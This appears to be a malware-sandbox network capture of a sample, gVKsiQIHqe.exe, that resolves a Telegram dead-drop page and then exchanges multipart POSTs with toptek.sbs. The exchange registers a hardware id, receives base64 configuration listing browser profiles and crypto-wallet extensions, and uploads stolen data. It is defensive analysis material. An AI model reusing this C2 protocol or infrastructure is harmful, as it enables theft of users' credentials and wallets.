                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.976608038 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.976654053 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.977042913 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.985490084 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.306772947 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.316381931 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.316391945 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.316399097 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.316857100 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.325165987 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.640333891 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.647600889 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.647614956 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.647664070 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.647993088 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.655495882 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.971407890 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.979032040 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.979043961 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.979144096 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.979356050 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.986666918 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.302213907 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.308789968 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.308881998 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.308940887 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.309163094 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.317166090 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.640098095 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.640125036 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.640139103 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.640204906 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.640714884 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.649023056 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.964453936 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.969398022 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.969438076 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.969495058 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.969753981 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.977382898 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.292382956 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.297456026 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.297470093 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.297580004 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.298038006 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.305217028 CET64183443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.620156050 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.625483990 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.625525951 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.625606060 CET4436418323.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.625854969 CET64183443192.168.2.523.209.72.7
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 23, 2024 06:57:51.232611895 CET | 192.168.2.5 | 1.1.1.1 | c29b | (Port unreachable) | Destination Unreachable

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 06:57:15.500107050 CET | 192.168.2.5 | 1.1.1.1 | 0x8853 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:17.704885006 CET | 192.168.2.5 | 1.1.1.1 | 0xd576 | Standard query (0) | toptek.sbs | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:33.821027040 CET | 192.168.2.5 | 1.1.1.1 | 0xa924 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:33.821177006 CET | 192.168.2.5 | 1.1.1.1 | 0x3ce5 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:57:49.298034906 CET | 192.168.2.5 | 1.1.1.1 | 0x7f5a | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:49.298579931 CET | 192.168.2.5 | 1.1.1.1 | 0x5750 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:57:51.765254974 CET | 192.168.2.5 | 1.1.1.1 | 0x4173 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:51.765458107 CET | 192.168.2.5 | 1.1.1.1 | 0x8224 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Dec 23, 2024 06:57:52.599596024 CET | 192.168.2.5 | 1.1.1.1 | 0x56cd | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:52.599853039 CET | 192.168.2.5 | 1.1.1.1 | 0x25a9 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:57:53.695800066 CET | 192.168.2.5 | 1.1.1.1 | 0xcdce | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:53.697206020 CET | 192.168.2.5 | 1.1.1.1 | 0xe3ff | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.704097986 CET192.168.2.51.1.1.10xa880Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.704576015 CET192.168.2.51.1.1.10x9367Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.763902903 CET192.168.2.51.1.1.10xc882Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:53.764364958 CET192.168.2.51.1.1.10x31feStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.449621916 CET192.168.2.51.1.1.10x677bStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.449738979 CET192.168.2.51.1.1.10x350fStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.464361906 CET192.168.2.51.1.1.10x66b7Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.464550972 CET192.168.2.51.1.1.10xab20Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.588921070 CET192.168.2.51.1.1.10xc937Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.589066982 CET192.168.2.51.1.1.10x9fd7Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.731015921 CET192.168.2.51.1.1.10xdd8dStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.731249094 CET192.168.2.51.1.1.10xa12Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.568569899 CET192.168.2.51.1.1.10x702dStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:19.568811893 CET192.168.2.51.1.1.10x5bdStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 06:57:15.641165972 CET | 1.1.1.1 | 192.168.2.5 | 0x8853 | No error (0) | t.me |  | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:17.933862925 CET | 1.1.1.1 | 192.168.2.5 | 0xd576 | No error (0) | toptek.sbs |  | 94.130.188.57 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:33.957706928 CET | 1.1.1.1 | 192.168.2.5 | 0xa924 | No error (0) | www.google.com |  | 142.250.181.132 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:33.959024906 CET | 1.1.1.1 | 192.168.2.5 | 0x3ce5 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
Dec 23, 2024 06:57:49.434943914 CET | 1.1.1.1 | 192.168.2.5 | 0x7f5a | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:49.435751915 CET | 1.1.1.1 | 192.168.2.5 | 0x5750 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:49.956629038 CET | 1.1.1.1 | 192.168.2.5 | 0xd8e5 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:49.956629038 CET | 1.1.1.1 | 192.168.2.5 | 0xd8e5 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net |  | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:50.038609982 CET | 1.1.1.1 | 192.168.2.5 | 0xbcad | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:51.902947903 CET | 1.1.1.1 | 192.168.2.5 | 0x4173 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:51.903953075 CET | 1.1.1.1 | 192.168.2.5 | 0x8224 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:52.839467049 CET | 1.1.1.1 | 192.168.2.5 | 0x56cd | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:52.839467049 CET | 1.1.1.1 | 192.168.2.5 | 0x56cd | No error (0) | googlehosted.l.googleusercontent.com |  | 142.250.181.65 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:52.840306044 CET | 1.1.1.1 | 192.168.2.5 | 0x25a9 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:53.832571030 CET | 1.1.1.1 | 192.168.2.5 | 0xcdce | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:53.832571030 CET | 1.1.1.1 | 192.168.2.5 | 0xcdce | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:53.834531069 CET | 1.1.1.1 | 192.168.2.5 | 0xe3ff | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Dec 23, 2024 06:57:53.840867043 CET | 1.1.1.1 | 192.168.2.5 | 0xa880 | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:53.840867043 CET | 1.1.1.1 | 192.168.2.5 | 0xa880 | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:53.841548920 CET | 1.1.1.1 | 192.168.2.5 | 0x9367 | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Dec 23, 2024 06:57:53.901259899 CET | 1.1.1.1 | 192.168.2.5 | 0x31fe | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Dec 23, 2024 06:57:53.901654959 CET | 1.1.1.1 | 192.168.2.5 | 0xc882 | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:53.901654959 CET | 1.1.1.1 | 192.168.2.5 | 0xc882 | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:54.586496115 CET | 1.1.1.1 | 192.168.2.5 | 0x677b | No error (0) | sb.scorecardresearch.com |  | 18.165.220.110 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:54.586496115 CET | 1.1.1.1 | 192.168.2.5 | 0x677b | No error (0) | sb.scorecardresearch.com |  | 18.165.220.66 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:54.586496115 CET | 1.1.1.1 | 192.168.2.5 | 0x677b | No error (0) | sb.scorecardresearch.com |  | 18.165.220.106 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:54.586496115 CET | 1.1.1.1 | 192.168.2.5 | 0x677b | No error (0) | sb.scorecardresearch.com |  | 18.165.220.57 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:57:54.601387978 CET | 1.1.1.1 | 192.168.2.5 | 0xab20 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:54.601830006 CET | 1.1.1.1 | 192.168.2.5 | 0x66b7 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:54.725667953 CET | 1.1.1.1 | 192.168.2.5 | 0x9fd7 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:54.727541924 CET | 1.1.1.1 | 192.168.2.5 | 0xc937 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:54.868402958 CET | 1.1.1.1 | 192.168.2.5 | 0xdd8d | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:57:54.869535923 CET | 1.1.1.1 | 192.168.2.5 | 0xa12 | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:59:19.705984116 CET | 1.1.1.1 | 192.168.2.5 | 0x702d | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:59:19.705984116 CET | 1.1.1.1 | 192.168.2.5 | 0x702d | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:59:19.706583977 CET | 1.1.1.1 | 192.168.2.5 | 0x5bd | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
• t.me
• toptek.sbs
• www.google.com
• chrome.cloudflare-dns.com
• clients2.googleusercontent.com
• https:
  • sb.scorecardresearch.com
  • browser.events.data.msn.com
  • c.msn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 149.154.167.99 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:17 UTC | 85 | OUT | GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:17 UTC | 512 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 23 Dec 2024 05:57:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12296
Connection: close
Set-Cookie: stel_ssid=63c66010c79cf1f234_16855964949177906532; expires=Tue, 24 Dec 2024 05:57:17 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-23 05:57:17 UTC | 12296 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:19 UTC | 230 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:20 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:21 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PHLFC2NGVAAIEUSR9RI5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:21 UTC | 256 | OUT
Data Ascii: ------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="hwid"7971487A55ED1253131813-a33c7340-61ca------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------PHLFC2NGVAAIEUSR9RI5--
2024-12-23 05:57:22 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:22 UTC | 69 | IN
Data Ascii: 3a1|1|1|1|56d79d211678d143c3e6bd8262e8a87a|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:24 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----YCT0HVAS26FUAI5PZ5X4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:24 UTC | 331 | OUT
Data Ascii: ------YCT0HVAS26FUAI5PZ5X4Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------YCT0HVAS26FUAI5PZ5X4Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------YCT0HVAS26FUAI5PZ5X4Cont
2024-12-23 05:57:25 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:25 UTC | 2192 | IN
                                                                                                                                                                                                                                                                                    Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:26 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----26FU3EKF37QIE37Y5FUS
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:26 UTC | 331 | OUT
Data Ascii: ------26FU3EKF37QIE37Y5FUSContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------26FU3EKF37QIE37Y5FUSContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------26FU3EKF37QIE37Y5FUSCont
2024-12-23 05:57:27 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:27 UTC | 5837 | IN
                                                                                                                                                                                                                                                                                    Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49709 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:29 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----P8Q1VAS26F37YM79ZMGL
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:29 UTC | 332 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------P8Q1VAS26F37YM79ZMGLContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------P8Q1VAS26F37YM79ZMGLContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------P8Q1VAS26F37YM79ZMGLCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:29 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:30 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49710 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:31 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDBAI5PZC2VAAAAIM790
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 6465
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:31 UTC | 6465 | OUT | Data Ascii: ------HDBAI5PZC2VAAAAIM790Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------HDBAI5PZC2VAAAAIM790Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------HDBAI5PZC2VAAAAIM790Cont
2024-12-23 05:57:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:32 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49711 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:32 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDBAI5PZC2VAAAAIM790
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache
